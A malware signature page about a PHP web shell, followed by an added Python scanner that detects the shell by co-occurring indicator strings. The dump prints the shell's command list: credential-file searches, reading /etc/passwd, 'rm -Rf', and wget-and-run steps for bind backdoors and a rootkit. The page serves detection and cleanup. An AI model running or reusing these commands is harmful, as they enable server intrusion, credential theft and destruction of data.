Malware Signatures


php.backdoor.byz_webshell.001

Backdoors are server-side malicious scripts intended to give the attacker persistent, unauthorized access to the server. Typical examples are file managers, web shells, tools for bypassing the admin login, and single-purpose scripts that let the attacker upload and run other malicious code. The payload is PHP based, so it is meant for server-side use and runs directly on the server while the site is loaded. Only the result of the payload (such as the web shell environment) is visible in the browser, never the malicious code itself. It is very common for backdoors to leave no visible trace in the site's HTML, so they cannot be detected by accessing the infected site from the outside; server-level analysis is necessary in case of infection by this type of malware.

php.backdoor.byz_webshell is a complex web shell with several interesting functions implemented. It is able to operate on both Linux and Windows and provides a separate set of commands for each system. It also has simple mailer functions, so it can log the actions performed through it and send that log to a specific e-mail address.

Affecting

Any PHP-based web site (often through outdated WordPress, Joomla, osCommerce, Magento or Drupal installations, and stolen passwords).

Cleanup

You can remove this file completely. You can sign up with us and let our team remove the malware for you.

Dump

This part of the code shows the commands available in this web shell:

##[ QUICK COMMANDS ]##
if (!is_windows()) {
$cmdaliases = array(
array("List Directory", "ls -al"),
array("Find all suid files", "find / -type f -perm -04000 -ls"),
array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
array("Find all sgid files", "find / -type f -perm -02000 -ls"),
array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
array("Find config.inc.php files", "find / -type f -name config.inc.php"),
array("Find config* files", "find / -type f -name \"config*\""),
array("Find config* files in current dir", "find . -type f -name \"config*\""),
array("Find all writable folders and files", "find / -perm -2 -ls"),
array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
array("Find all writable folders", "find / -type d -perm -2 -ls"),
array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
array("Find all service.pwd files", "find / -type f -name service.pwd"),
array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
array("Find all .bash_history files", "find / -type f -name .bash_history"),
array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
array("List file attributes on a Linux second extended file system", "lsattr -va"),
array("Show opened ports", "netstat -an | grep -i listen"),
array("-----",""),
array("Logged in users","w"),
array("Last connect","lastlog"),
array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
array("Inet Address","/sbin/ifconfig | grep inet"),
array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
array("CPU Info","cat /proc/version /proc/cpuinfo"),
array("Is gcc installed ?","locate gcc"),
array("Format box (DANGEROUS)","rm -Rf"),
array("-----",""),
array("wget & run psyBNC","wget ".$sh_sourcez["psyBNC"][0].";tar -zxf ".$sh_sourcez["psyBNC"][1].";cd .fx;./config 29110;./fuck;./run"),
array("wget & extract EggDrop","wget ".$sh_sourcez["Eggdrop"][0].";tar -zxf ".$sh_sourcez["psyBNC"][1]),
array("wget & run BindDoor","wget ".$sh_sourcez["BindDoor"][0].";tar -zxvf ".$sh_sourcez["BindDoor"][1].";./bind"),
array("-----",""),
array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
);
}
else {
#Windows
$cmdaliases = array(
array("List Directory", "dir"),
array("Find index.php in current dir", "dir /s /w /b index.php"),
array("Find *config*.php in current dir", "dir /s /w /b *config*.php"),
array("Find c99shell in current dir", "find /c \"c99\" *"),
array("Find r57shell in current dir", "find /c \"r57\" *"),
array("Find fx29shell in current dir", "find /c \"fx29\" *"),
array("Show active connections", "netstat -an"),
array("Show running services", "net start"),
array("User accounts", "net user"),
array("Show computers", "net view"),
);
}
##[ PHP FILESYSTEM (By -==[COLUMBUS]==--) ]##
$phpfsaliases = array(
array("Read File", "read", 1, "File", ""),
array("Write File (PHP5)", "write", 2, "File","Text"),
array("Copy", "copy", 2, "From", "To"),
array("Rename/Move", "rename", 2, "File", "To"),
array("Delete", "delete", 1 ,"File", ""),
array("Make Dir","mkdir", 1, "Dir", ""),
array("Download", "download", 2, "URL", "To"),
array("Download (Binary Safe)", "downloadbin", 2, "URL", "To"),
array("Change Perm (0755)", "chmod", 2, "File", "Perms"),
array("Find Writable Dir", "fwritabledir", 2 ,"Dir", "Max"),
array("Find Pathname Pattern", "glob",2 ,"Dir", "Pattern"),
);
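The dump above gives a defender several strings that are unusual in legitimate PHP. The following Python scanner is an added example, not part of this signature page or of the web shell: it lifts a handful of those strings as indicators, requires several of them to co-occur before flagging a file, and walks a web root looking for candidates to remove. The indicator set, the hit threshold (MIN_HITS) and the two sample inputs are assumptions constructed for the example.

```python
import os
import re

# Indicator strings taken from the php.backdoor.byz_webshell.001 dump above.
# Several must match together, so one generic "find / -perm -2" line in a
# legitimate admin script does not trigger a false positive.
BYZ_INDICATORS = [
    re.compile(r"##\[\s*QUICK COMMANDS\s*\]##"),
    re.compile(r"\$cmdaliases\s*=\s*array\("),
    re.compile(r"\$phpfsaliases\s*=\s*array\("),
    re.compile(r'"Find all suid files"'),
    re.compile(r'\$sh_sourcez\["(?:psyBNC|Eggdrop|BindDoor)"\]'),
    re.compile(r'"(?:fwritabledir|downloadbin)"'),
    re.compile(r"COLUMBUS"),
]
MIN_HITS = 3  # assumed threshold, not taken from the signature page

def score_source(src: str) -> list:
    """Return the indicator patterns that match the given PHP source text."""
    return [p.pattern for p in BYZ_INDICATORS if p.search(src)]

def is_byz_webshell(src: str) -> bool:
    return len(score_source(src)) >= MIN_HITS

def scan_tree(root: str, exts=(".php", ".phtml", ".php5", ".inc")) -> list:
    """Walk a web root and return the paths that score as byz_webshell."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    if is_byz_webshell(fh.read()):
                        hits.append(path)
            except OSError:
                continue  # unreadable file: skip it rather than abort the scan
    return hits

# Constructed samples: a fragment shaped like the dump, and a benign file.
SAMPLE_SHELL = '''<?php
##[ QUICK COMMANDS ]##
$cmdaliases = array(
array("Find all suid files", "find / -type f -perm -04000 -ls"),
array("wget & run psyBNC","wget ".$sh_sourcez["psyBNC"][0]),
);
$phpfsaliases = array(array("Find Writable Dir", "fwritabledir", 2, "Dir", "Max"));
'''
SAMPLE_BENIGN = '<?php foreach (glob("*.php") as $f) { echo $f; }'
```

Run `scan_tree("/var/www")` (or the site's document root) to list files whose content matches; review each hit before deleting, since the threshold is a heuristic rather than a full signature match.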